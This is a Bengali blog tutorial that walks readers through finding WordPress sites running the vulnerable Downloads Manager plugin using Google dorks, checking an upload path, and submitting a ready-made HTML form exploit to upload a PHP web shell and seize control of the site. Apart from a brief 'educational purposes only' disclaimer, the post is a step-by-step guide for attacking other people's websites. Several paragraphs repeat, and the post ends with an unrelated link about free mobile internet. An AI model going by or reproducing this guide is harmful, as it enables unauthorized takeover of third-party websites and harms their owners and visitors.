সবাইকে স্বাগতম জানাচ্ছি আমার টিউনে আজকের টিউনে আমি আপনাদের দেখাবো কিভাবে আপনারা একটি ওয়ার্ডপ্রেস প্লাগিনের আপলোডিং কোডের দুর্বলতার সুযোগ বের করে পিএইচপি শেল ফাইল আপলোড করে সেই ওয়ার্ডপ্রসের ভুলনারবল প্লাগিন ইন্সটল থাকা সাইটটির সম্পুর্ন কন্ট্রোল নিজের কাছে আনতে পারেন।
এই টিউনটি সম্পুর্ন শিক্ষনীয় উদ্দেশ্যে লিখিত সুতারাং আশা করি এই টিউন ব্যবহার করে কেউ কোনো সাইটের ক্ষতি করবেন না।
চলুন তাহলে শুরু করা যাক, প্রথমেই ভুলনারবল সাইট বের করার জন্যে গুগল ডর্কের সাহায্য নিতে হবে।
আজকে যে প্লাগিনটার আপলোডিং ভুলনারাবেলেটি আপনাদের কাছে দেখাবো সে প্লাগিনটির নাম হচ্ছে ওয়ার্ডপ্রেস ডাউনলোডস ম্যানেজার এই প্লাগিন ইন্সটলড থাকা সাইটগুলো গুগলের মাধ্যমে বের করার জন্যে দুটি গুগল ডর্কস ইউজ করতে পারেন আপনারা আমি ডর্কদুটো শেয়ার করছি এখানে এবং ডর্কগুলোর সম্পর্কে বর্ননা দেওয়ার চেষ্টা করব।
এই টিউনটি সম্পুর্ন শিক্ষনীয় উদ্দেশ্যে লিখিত সুতারাং আশা করি এই টিউন ব্যবহার করে কেউ কোনো সাইটের ক্ষতি করবেন না।
চলুন তাহলে শুরু করা যাক, প্রথমেই ভুলনারবল সাইট বের করার জন্যে গুগল ডর্কের সাহায্য নিতে হবে।
আজকে যে প্লাগিনটার আপলোডিং ভুলনারাবেলেটি আপনাদের কাছে দেখাবো সে প্লাগিনটির নাম হচ্ছে ওয়ার্ডপ্রেস ডাউনলোডস ম্যানেজার এই প্লাগিন ইন্সটলড থাকা সাইটগুলো গুগলের মাধ্যমে বের করার জন্যে দুটি গুগল ডর্কস ইউজ করতে পারেন আপনারা আমি ডর্কদুটো শেয়ার করছি এখানে এবং ডর্কগুলোর সম্পর্কে বর্ননা দেওয়ার চেষ্টা করব।
Google Dork : inurl:wp-content/plugins/downloads-manager/
Index of /wp-content/plugins/downloads-manager
Index of /wp-content/plugins/downloads-manager
প্রথম ডর্কটি দেখুন শুরুতে লেখা আছে inurl: এই ডর্কটির কাজ হচ্ছে এরপরের অংশে আপনি যে লেখাটি লিখবেন সে লেখা যত ওয়েবসাইটের লিঙ্ক গুগলের ইনডেক্সে সেইভ করা আছে সে লিঙ্কগুলো আপনাদের দেখাবে।
আর এর পরের ডর্কটির কাজ হচ্ছে এই ডর্কটি ইনডেক্স অফের পরে লেখা অংশটি যত ওয়েবপেইজে লেখা আছে গুগলে সেইভ আছে এমন ওয়েবসাইটগুলো, সেই ওয়েবসাইট গুলো দেখাবে।
আর এর পরের ডর্কটির কাজ হচ্ছে এই ডর্কটি ইনডেক্স অফের পরে লেখা অংশটি যত ওয়েবপেইজে লেখা আছে গুগলে সেইভ আছে এমন ওয়েবসাইটগুলো, সেই ওয়েবসাইট গুলো দেখাবে।
এবার আমি এক্সপ্লইটটি শেয়ার করবো যেটা ব্যবহার করে আপনারা শেল আপলোড করতে পারবেন ভুলনারবল ওয়েবসাইটে।
এক্সপ্লইট কোডঃ
-
<html>
<body>
<form action="http://vulnerablesite.com" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dm_upload" />
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
-
এই এক্সপ্লইট কোডটি নোটপ্যাডে কপি করুন এবং ভুলনারাবল সাইট লেখা যায়গায় ডর্কের সাহায্যে বের করি সাইটের এড্রেস দিবেন।
এরপরে নোটপ্যাডে সেইভএস অপশনে গিয়ে আপনার পছন্দ মতো যেকোনো নামে সেইভ করুন html extension ব্যবহার করে।
আপনি গুগল ডর্কের সাহায্যে গুগলে সার্চ দিয়ে সাইট বের করলেন রেসাল্টেও অনেক সাইট আসলো কিন্তু এইখানের সব সাইটগুলো ভুলনারাবল না, সুতারাং সাইটগুলো ভুলনারবল কিনা চেক করতে সাইট লিঙ্কের শেষে এই এড্রেস টি যোগ করে দিন: /wp-content/plugins/downloads-manager/upload/
যদি পেইজটি সফলভাবে লোড হয় তাইলে বুঝবেন সাইটটি ভুলনারবল হতে পারে।
-
<html>
<body>
<form action="http://vulnerablesite.com" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dm_upload" />
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
-
এই এক্সপ্লইট কোডটি নোটপ্যাডে কপি করুন এবং ভুলনারাবল সাইট লেখা যায়গায় ডর্কের সাহায্যে বের করি সাইটের এড্রেস দিবেন।
এরপরে নোটপ্যাডে সেইভএস অপশনে গিয়ে আপনার পছন্দ মতো যেকোনো নামে সেইভ করুন html extension ব্যবহার করে।
আপনি গুগল ডর্কের সাহায্যে গুগলে সার্চ দিয়ে সাইট বের করলেন রেসাল্টেও অনেক সাইট আসলো কিন্তু এইখানের সব সাইটগুলো ভুলনারাবল না, সুতারাং সাইটগুলো ভুলনারবল কিনা চেক করতে সাইট লিঙ্কের শেষে এই এড্রেস টি যোগ করে দিন: /wp-content/plugins/downloads-manager/upload/
যদি পেইজটি সফলভাবে লোড হয় তাইলে বুঝবেন সাইটটি ভুলনারবল হতে পারে।
এবার যদি সাইট টি ভুলনরাবল হয় তাহলে এক্সপ্লইট কোডে সাইট টি যোগ করে এক্সপ্লইট কোডটি এইচটিএমএল ফরম্যাটে সেইভ করুন এবং এইচটিএমএল ফাইলটি ওপেন করে আপনার শেল ফাইল সিলেক্ট করে সাবমিট বাটনে ক্লিক করুন।
যদি ঠিকভাবে আপনার শেলটি আপলোড হয়ে তাহলে সাইটের শেষে এই লিঙ্ক যুক্ত করে দিন এবং সেখানে আপনি কিছুক্ষন খুজলেই আপনার শেলটি খুঁজে পাবেন।
ধন্যবাদ সবাইকে টিউনটি পড়ার জন্যে ভালো লেগে থাকলে অবশ্যই টিউনমেন্টের মাধ্যমে জানাবেন।
যদি ঠিকভাবে আপনার শেলটি আপলোড হয়ে তাহলে সাইটের শেষে এই লিঙ্ক যুক্ত করে দিন এবং সেখানে আপনি কিছুক্ষন খুজলেই আপনার শেলটি খুঁজে পাবেন।
ধন্যবাদ সবাইকে টিউনটি পড়ার জন্যে ভালো লেগে থাকলে অবশ্যই টিউনমেন্টের মাধ্যমে জানাবেন।
![জিপি (GrameenPhone) ফ্রি নেট [নতুন আপডেট] টাকা এমবি ছাড়া চলে-](https://yt3.ggpht.com/-NGE3HNPOFPw/AAAAAAAAAAI/AAAAAAAAAAA/GlFOV3p1AIk/s72-c-k-c0xffffff-no-rj-mo/photo.jpg "জিপি (GrameenPhone) ফ্রি নেট [নতুন আপডেট] টাকা এমবি ছাড়া চলে-")
0 comments:
Post a Comment